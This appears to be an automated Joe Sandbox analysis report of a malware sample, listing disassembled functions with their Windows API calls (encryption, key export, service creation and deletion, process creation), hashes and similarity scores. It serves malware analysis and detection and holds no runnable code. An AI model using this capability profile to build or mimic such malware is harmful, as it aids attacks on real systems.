Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3a89d8681634d02d891e9464d1d42ec086164b2e2d9b2433e683ec51104b3125
Instruction ID: f7d83ee54451dfd7478fea75bfce7d982527e0b8232ba8552fb087d341132f18
Opcode Fuzzy Hash: 3a89d8681634d02d891e9464d1d42ec086164b2e2d9b2433e683ec51104b3125
Instruction Fuzzy Hash: C4C08C2003571062E22037F91D0F3CE30C84F25390F000230BE70840C2EE30A4F1887B

Uniqueness

Uniqueness Score: 0.01%

Function 0021CB6C, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

APIs

GetVolumeInformationW.KERNELBASE(?), ref: 0021CB7B

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: ceec7c48410d4a2b4f57703b529616c5cf1dde62738c3d087b66f64d8e4da346
Instruction ID: 751660fca3fc6c8975e5f7d9ae1f53a20400d0e51203884928ef050ae49f27d7
Opcode Fuzzy Hash: ceec7c48410d4a2b4f57703b529616c5cf1dde62738c3d087b66f64d8e4da346
Instruction Fuzzy Hash: AFC02B3C80020C5BC628DBD0EC0EC96737CDF04212F014BC7AD0C4BD21E57055644B03

Uniqueness

Uniqueness Score: 0.02%

Function 00211264, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

APIs

GetFileAttributesW.KERNELBASE ref: 00211264

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b287bf861617c0aa4bf287a9381fd29cc6bd2ad82f497af21ac182569235e33a
Instruction ID: a30db1e582166157aa9919722745de1e1ecf69fe848bf0365318cad5dd030820
Opcode Fuzzy Hash: b287bf861617c0aa4bf287a9381fd29cc6bd2ad82f497af21ac182569235e33a
Instruction Fuzzy Hash: 44C08CA0438261CDAA389FA854A97B522D15A31334F701712CF76D00D093F008F4A023

Uniqueness

Uniqueness Score: 0.01%

Function 0021F543, Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON

APIs

CreateFileW.KERNELBASE ref: 0021F545

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 35386bab87d61e32785487cbfd5523b846dbdc42134a179d31c3860bf3f199e5
Instruction ID: 69423224e7461dc0d541edc1b17c77b67aff48c16d3b41eb69198b3a1dcc7497
Opcode Fuzzy Hash: 35386bab87d61e32785487cbfd5523b846dbdc42134a179d31c3860bf3f199e5
Instruction Fuzzy Hash: 42B0123A8355335A416C3A7C358C0F85181C61A3357271BE1DCF35F1E0AA100CFB40C2

Uniqueness

Uniqueness Score: 0.01%

Function 00211C10, Relevance: 1.5, APIs: 1, Instructions: 8processCOMMON

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00211C14

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: 2fd691d01153ecb97f83111c1070fa57743384de1ffb0441dc7a583671b96ffe
Instruction ID: ba5c97b485aa702d1d3a628441de1579496cd65e6de3d8ab611c51e2c7bda6b1
Opcode Fuzzy Hash: 2fd691d01153ecb97f83111c1070fa57743384de1ffb0441dc7a583671b96ffe
Instruction Fuzzy Hash: 86B092B2534A208783382A78689C06860901A6A33476A0762CF7A932E0A6B08C729892

Uniqueness

Uniqueness Score: 0.01%

Function 0021F3AD, Relevance: 1.5, APIs: 1, Instructions: 2COMMON

APIs

SHGetFolderPathW.SHELL32 ref: 0021F3AD

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: f58cb2a593c3a0281d3c91fd744e22d9a96f5b0f12b6ef5b67ebc7d663727246
Instruction ID: 0c4614fed5a8586e07a040a8871a5fc7c75e555f42c37e2e63f000992718c486
Opcode Fuzzy Hash: f58cb2a593c3a0281d3c91fd744e22d9a96f5b0f12b6ef5b67ebc7d663727246
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: 0.01%

Function 00401105, Relevance: 1.3, APIs: 1, Instructions: 58memoryCOMMON

APIs

VirtualAlloc.KERNELBASE ref: 004011BA

Memory Dump Source

Source File: 00000013.00000002.1067112680.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1067104402.00400000.00000002.sdmp
Associated: 00000013.00000002.1067123364.00403000.00000002.sdmp
Associated: 00000013.00000002.1067137356.00404000.00000004.sdmp
Associated: 00000013.00000002.1067145581.00407000.00000008.sdmp
Associated: 00000013.00000002.1067162239.00411000.00000008.sdmp
Associated: 00000013.00000002.1067191591.00427000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_rsh.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bc03ad2848108be0b88a081dab1cfe64323a2bf15195c138f60f82a15d44c430
Instruction ID: 56eddcb4e82b02089b78e9a68d76c0eddc698a2e06fe2d4a8cf325d7ec8366ef
Opcode Fuzzy Hash: bc03ad2848108be0b88a081dab1cfe64323a2bf15195c138f60f82a15d44c430
Instruction Fuzzy Hash: 1C2134B4D04209DFCB04DFA5D6806AEBBF5EF48304F10842EE958AB390D335AA41CF86

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Function 0021F8B0, Relevance: 6.0, APIs: 4, Instructions: 34serviceCOMMON

APIs

_snwprintf.NTDLL ref: 0021F8D6
OpenServiceW.ADVAPI32(?,?,00010000), ref: 0021F8F3
DeleteService.ADVAPI32(00000000,?,?,00010000), ref: 0021F900
CloseServiceHandle.ADVAPI32(00000000,?,?,00010000), ref: 0021F909

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Service$CloseDeleteHandleOpen_snwprintf
String ID:
API String ID: 88604382-0
Opcode ID: a1ca03b6a10fb5e87fd382918cb2e9807fcb2b78b7139d2fd70c2a35a650fe2f
Instruction ID: 643398e53e51020926445afe80a030caad2b55c9435131b0157d5a43922ec1a1
Opcode Fuzzy Hash: a1ca03b6a10fb5e87fd382918cb2e9807fcb2b78b7139d2fd70c2a35a650fe2f
Instruction Fuzzy Hash: 3BF02E7661011077C73177E47C0CAEE77AC9B4C750F001266FA49D3111DE718EB24B95

Uniqueness

Uniqueness Score: 0.02%

Function 002123B7, Relevance: 6.0, APIs: 4, Instructions: 14encryptionCOMMON

APIs

CryptCreateHash.ADVAPI32 ref: 002123BC
CryptDestroyKey.ADVAPI32 ref: 002123D2
CryptDestroyKey.ADVAPI32 ref: 002123DE
CryptReleaseContext.ADVAPI32(00000000), ref: 002123EC

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Crypt$Destroy$ContextCreateHashRelease
String ID:
API String ID: 4057265880-0
Opcode ID: fc27f2aad4cc3d7280f4b87b4a816e0bb22bac9d85dc3f655c3e2fa8b0ccbd55
Instruction ID: 7d2b9ef5e55732faf331b699f47c407bf1cc3ba8f8000d69c027e9e21f05cc12
Opcode Fuzzy Hash: fc27f2aad4cc3d7280f4b87b4a816e0bb22bac9d85dc3f655c3e2fa8b0ccbd55
Instruction Fuzzy Hash: 20D0673012C101FBD7322FE4FC0D6453AA1BB24702B416560F91580074CB2184B29B21

Uniqueness

Uniqueness Score: 0.02%

Function 002124F6, Relevance: 4.6, APIs: 3, Instructions: 73encryptionCOMMON

APIs

Part of subcall function 002117C0: GetProcessHeap.KERNEL32(00000008,?,00216B19), ref: 002117C3
Part of subcall function 002117C0: RtlAllocateHeap.NTDLL(00000000,?,00216B19), ref: 002117CA

CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00212554
CryptDecrypt.ADVAPI32(?,?,00000001,00000000,?,?), ref: 00212582
CryptDestroyHash.ADVAPI32(?), ref: 002125B1

Part of subcall function 00211830: GetProcessHeap.KERNEL32(00000000,?,0021CE77), ref: 00211833
Part of subcall function 00211830: HeapFree.KERNEL32(00000000), ref: 0021183A

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Heap$Crypt$HashProcess$AllocateDecryptDestroyDuplicateFree
String ID:
API String ID: 3328019083-0
Opcode ID: c70ae2057561ec79c709a69aca5487ff1269356f779b61f74b594a40b19a0bf9
Instruction ID: eb73acf8c0d8d86fbdf9478e3fed21c69e40bb4f1448791650b399680ffa801a
Opcode Fuzzy Hash: c70ae2057561ec79c709a69aca5487ff1269356f779b61f74b594a40b19a0bf9
Instruction Fuzzy Hash: FC218C71A1010AFFDB248F54DCC0B9AB7E6EF14300F544165F505A7251E730DAB48B90

Uniqueness

Uniqueness Score: 0.03%

Function 0040131D, Relevance: 4.6, APIs: 3, Instructions: 71timeUNIQUE

APIs

DdeAddData.USER32(000650AF,00000002,000003EE,000003EE), ref: 004013C0
VarI2FromBool.OLEAUT32(0000003F,?), ref: 004013DC
DosDateTimeToFileTime.KERNEL32(00000018,00000008,?), ref: 004013EF

Memory Dump Source

Source File: 00000013.00000002.1067112680.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.1067104402.00400000.00000002.sdmp
Associated: 00000013.00000002.1067123364.00403000.00000002.sdmp
Associated: 00000013.00000002.1067137356.00404000.00000004.sdmp
Associated: 00000013.00000002.1067145581.00407000.00000008.sdmp
Associated: 00000013.00000002.1067162239.00411000.00000008.sdmp
Associated: 00000013.00000002.1067191591.00427000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_rsh.jbxd

Similarity

API ID: Time$BoolDataDateFileFrom
String ID:
API String ID: 3351727435-0
Opcode ID: 203b2c8d0c995a8781aef7231bffd5b55038142c82f1482647e2fcf25fc06334
Instruction ID: 46c947bf33c4e94d8250dfbb7d78ec3d26d7281bbe9c7593a9ce93f3fa553643
Opcode Fuzzy Hash: 203b2c8d0c995a8781aef7231bffd5b55038142c82f1482647e2fcf25fc06334
Instruction Fuzzy Hash: 34212DB1D50319ABDF08DFE4DC45AEEBBB5BF58700F00402AE505BB284EAB51A44CB54

Uniqueness

Uniqueness Score: 100.00%

Function 0021F9F1, Relevance: 4.5, APIs: 3, Instructions: 16serviceCOMMON

APIs

StartServiceW.ADVAPI32 ref: 0021F9F1
CloseServiceHandle.ADVAPI32 ref: 0021F9FA
CloseServiceHandle.ADVAPI32(?,?,echoshims,echoshims,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0021FA0C

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Service$CloseHandle$Start
String ID:
API String ID: 390812829-0
Opcode ID: 001b396dd9e45e2ba3e12db00a55dc476c0549b3a8f70d91ca316c37c0809148
Instruction ID: 68ac7195036b15856d86677df2428eb8d6d3031805c819a578db1585b6361906
Opcode Fuzzy Hash: 001b396dd9e45e2ba3e12db00a55dc476c0549b3a8f70d91ca316c37c0809148
Instruction Fuzzy Hash: 6AD0133671412057455077E47C4C07CF754F6641A33411176FD0DC2110CA5548B35F41

Uniqueness

Uniqueness Score: 0.04%

Function 00212335, Relevance: 4.5, APIs: 3, Instructions: 15encryptionCOMMON

APIs

CryptImportKey.ADVAPI32 ref: 0021233A
LocalFree.KERNEL32(?), ref: 00212345
CryptReleaseContext.ADVAPI32(00000000), ref: 00212357

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Crypt$ContextFreeImportLocalRelease
String ID:
API String ID: 202888279-0
Opcode ID: 040d5e3349e7896eb9a19db6cd770f29eb891ab78ffbef42d18e85bd975e43ea
Instruction ID: da67cf18a97dc1c942e5885799b74c7d75fb41bce172dfa71dc9cf0a1d884043
Opcode Fuzzy Hash: 040d5e3349e7896eb9a19db6cd770f29eb891ab78ffbef42d18e85bd975e43ea
Instruction Fuzzy Hash: 5DD09E32A68124FBDB326FD4BC0C6587BA4F725752B011291FD19D2220C6214C725A91

Uniqueness

Uniqueness Score: 0.02%

Function 00212399, Relevance: 4.5, APIs: 3, Instructions: 12encryptionCOMMON

APIs

CryptGenKey.ADVAPI32 ref: 0021239E
CryptDestroyKey.ADVAPI32 ref: 002123DE
CryptReleaseContext.ADVAPI32(00000000), ref: 002123EC

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Crypt$ContextDestroyRelease
String ID:
API String ID: 1322390979-0
Opcode ID: c53db4c21f483e2ccc28082c199fb53d0296e342b3fbffe156729d133907e1db
Instruction ID: a823c3ac78cfbe128ec0363864ac6c80d5bd1eca3b636bdd4fbb1a5a5ad03da8
Opcode Fuzzy Hash: c53db4c21f483e2ccc28082c199fb53d0296e342b3fbffe156729d133907e1db
Instruction Fuzzy Hash: 62D0C93012C105FBD7323FE0BC0C7063AA0BB24702F412260F519D0074DB6184F2AB21

Uniqueness

Uniqueness Score: 0.02%

Function 00212279, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13encryptionCOMMON

APIs

CryptExportKey.ADVAPI32(?,?,00000001,00000040,?), ref: 0021228B

Strings

l, xrefs: 00212279

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CryptExport
String ID: l
API String ID: 3389274496-2517025534
Opcode ID: 09ef2aec2b43946fde79f9f293ad29b6138e6c1755a3a59a1588653c6519f968
Instruction ID: 7ae8fb1db74bd0c46063ba0c5fcabc56c025fe50c63eff2651e34e9ac4594382
Opcode Fuzzy Hash: 09ef2aec2b43946fde79f9f293ad29b6138e6c1755a3a59a1588653c6519f968
Instruction Fuzzy Hash: 9BD012F0238208F9F7349BA18C99FBF756CAB00B00F10410A7602A5080D6F599659E30

Uniqueness

Uniqueness Score: 0.02%

Function 00212466, Relevance: 3.0, APIs: 2, Instructions: 29encryptionCOMMON

APIs

CryptEncrypt.ADVAPI32(?,?,00000001,?,?), ref: 00212485
CryptDestroyHash.ADVAPI32(?,?,?), ref: 002124C4

Part of subcall function 00211830: GetProcessHeap.KERNEL32(00000000,?,0021CE77), ref: 00211833
Part of subcall function 00211830: HeapFree.KERNEL32(00000000), ref: 0021183A

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CryptHeap$DestroyEncryptFreeHashProcess
String ID:
API String ID: 2265275737-0
Opcode ID: 26e8c54493509fda9e77fc9bdb750553a89ae54e4a03d02c1dcf11c15cacfb9d
Instruction ID: 2fda3ced2ac0a7defb694cbb5a0b8c221aa53ada4ed4afb25a7713c39bd2df22
Opcode Fuzzy Hash: 26e8c54493509fda9e77fc9bdb750553a89ae54e4a03d02c1dcf11c15cacfb9d
Instruction Fuzzy Hash: 08F08231610115EBDB219F84EC48BDABF64FF25790F104155F90C8B261C73189B6DB80

Uniqueness

Uniqueness Score: 0.03%

Function 0021F6C4, Relevance: 3.0, APIs: 2, Instructions: 25serviceCOMMON

APIs

EnumServicesStatusExW.ADVAPI32(?,?,00000030,00000003), ref: 0021F6D7
GetLastError.KERNEL32(?,?,00000030,00000003), ref: 0021F6E5

Part of subcall function 002117C0: GetProcessHeap.KERNEL32(00000008,?,00216B19), ref: 002117C3
Part of subcall function 002117C0: RtlAllocateHeap.NTDLL(00000000,?,00216B19), ref: 002117CA

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Heap$AllocateEnumErrorLastProcessServicesStatus
String ID:
API String ID: 1360102720-0
Opcode ID: 613cb5ff9642c48f50d7faf5b803c8cad4497f06a101ad5bf92c5ccb03e13d59
Instruction ID: c6651d8a81ca59c080e36cd9f7a99869ddefb818f0bd05d34c2952453fed4075
Opcode Fuzzy Hash: 613cb5ff9642c48f50d7faf5b803c8cad4497f06a101ad5bf92c5ccb03e13d59
Instruction Fuzzy Hash: EEE0D170B1010667D7259F55CD44B7FF5FCDB61740F10003AB110E5190E7B04EA2CB91

Uniqueness

Uniqueness Score: 0.03%

Function 00212595, Relevance: 3.0, APIs: 2, Instructions: 24encryptionCOMMON

APIs

CryptVerifySignatureW.ADVAPI32(?,?), ref: 0021259E
CryptDestroyHash.ADVAPI32(?), ref: 002125B1

Part of subcall function 00211830: GetProcessHeap.KERNEL32(00000000,?,0021CE77), ref: 00211833
Part of subcall function 00211830: HeapFree.KERNEL32(00000000), ref: 0021183A

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CryptHeap$DestroyFreeHashProcessSignatureVerify
String ID:
API String ID: 2013711131-0
Opcode ID: fd496982198d05ee11e011d48befc9da079c40d81ec499db12f49ad2a3d2fd7a
Instruction ID: 94a4d632b774174af7f6ad3cc9b07c4dd3b8cdf39592d26f2f2d83327ec84bac
Opcode Fuzzy Hash: fd496982198d05ee11e011d48befc9da079c40d81ec499db12f49ad2a3d2fd7a
Instruction Fuzzy Hash: A5E04F31B10014FBDB251F94EC587DABBE6FF54361F1040A5E90696260EBB24DB28F80

Uniqueness

Uniqueness Score: 0.03%

Function 00212406, Relevance: 1.5, APIs: 1, Instructions: 45encryptionCOMMON

APIs

Part of subcall function 002117C0: GetProcessHeap.KERNEL32(00000008,?,00216B19), ref: 002117C3
Part of subcall function 002117C0: RtlAllocateHeap.NTDLL(00000000,?,00216B19), ref: 002117CA

CryptDuplicateHash.ADVAPI32(?,00000000,00000000,?), ref: 00212454

Part of subcall function 00211830: GetProcessHeap.KERNEL32(00000000,?,0021CE77), ref: 00211833
Part of subcall function 00211830: HeapFree.KERNEL32(00000000), ref: 0021183A

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Heap$Process$AllocateCryptDuplicateFreeHash
String ID:
API String ID: 1040508988-0
Opcode ID: bb0397a71599750ffb3088f359f4e4012e83b59f335ff8859a2be19e1ff8f10f
Instruction ID: 766c7520b6f7618d952d7f38a81ce8aafc3ce9505befc1b2ed3ccc9a1cb88dec
Opcode Fuzzy Hash: bb0397a71599750ffb3088f359f4e4012e83b59f335ff8859a2be19e1ff8f10f
Instruction Fuzzy Hash: B80175B6A1010ADFD710CF59D844BDAFBF4EF14350F148166E508D7251D730DA64CB90

Uniqueness

Uniqueness Score: 0.03%

Function 00212496, Relevance: 1.5, APIs: 1, Instructions: 29encryptionCOMMON

APIs

CryptDestroyHash.ADVAPI32(?,?,?), ref: 002124C4

Part of subcall function 00211830: GetProcessHeap.KERNEL32(00000000,?,0021CE77), ref: 00211833
Part of subcall function 00211830: HeapFree.KERNEL32(00000000), ref: 0021183A

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Heap$CryptDestroyFreeHashProcess
String ID:
API String ID: 21667265-0
Opcode ID: 0ae94729ae4283c4fe24eb8199adabbe66ca9a3ad63f24200f50c840e1e26d4c
Instruction ID: 535897c0550b6205ebed776be5936e7e0d542ee58568ae6cebb5beaedef1d448
Opcode Fuzzy Hash: 0ae94729ae4283c4fe24eb8199adabbe66ca9a3ad63f24200f50c840e1e26d4c
Instruction Fuzzy Hash: 48F08C716101059BEB10AF14E845B9AB7D1EF60344F108164EC098B261EB71DDB9CBC0

Uniqueness

Uniqueness Score: 0.02%

Function 00212314, Relevance: 1.5, APIs: 1, Instructions: 21encryptionCOMMON

APIs

CryptReleaseContext.ADVAPI32(00000000), ref: 00212357

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: e027ca397b1889de5d3100330723e6cc11c4aff4f9e836de622f6aeb1a789f84
Instruction ID: c3a42c985c140a1aff97edd71251ee730e67388c48a7595d194ec548714dc6c6
Opcode Fuzzy Hash: e027ca397b1889de5d3100330723e6cc11c4aff4f9e836de622f6aeb1a789f84
Instruction Fuzzy Hash: C7C08C3432820AEBE6306FD4BC0CB653B54F725703F0412E2FE0AC6174CA9188328AD2

Uniqueness

Uniqueness Score: 0.04%

Function 0021210D, Relevance: 1.5, APIs: 1, Instructions: 13processCOMMON

APIs

CreateProcessAsUserW.ADVAPI32 ref: 0021210D

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 75ce776ee7d9979574d6a695bbccae6f459d3cfb4b152d51244c02c7ea3fdde6
Instruction ID: 20da0a0ffbaba135308cd27722ed4b318cabe58a334e8bcab0cc217d55eee30f
Opcode Fuzzy Hash: 75ce776ee7d9979574d6a695bbccae6f459d3cfb4b152d51244c02c7ea3fdde6
Instruction Fuzzy Hash: B5C0C936700104AB8B106BE5B80C49CB761FB842627140165EA09C3310CA324C628A90

Uniqueness

Uniqueness Score: 0.04%

Function 002122F5, Relevance: 1.5, APIs: 1, Instructions: 11encryptionCOMMON

APIs

CryptAcquireContextW.ADVAPI32 ref: 002122F7

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: AcquireContextCrypt
String ID:
API String ID: 3951991833-0
Opcode ID: f4f5acd7d7a2d41c4ad419a2b5b1dc677b85432fbdd6d2236400ee9860f582d9
Instruction ID: f5ca975e2ef06be0fc4ecfc9e7e8080351a9ca36e86b22e72fc8301fdc575bdf
Opcode Fuzzy Hash: f4f5acd7d7a2d41c4ad419a2b5b1dc677b85432fbdd6d2236400ee9860f582d9
Instruction Fuzzy Hash: 57B0922272401A8715242B9838881BA738AE612652B0805DAAE2ECAA02D98188BA56D3

Uniqueness

Uniqueness Score: 0.03%

Function 002122C9, Relevance: 1.5, APIs: 1, Instructions: 9encryptionCOMMON

APIs

CryptGetHashParam.ADVAPI32(?,00000002), ref: 002122D5

Memory Dump Source

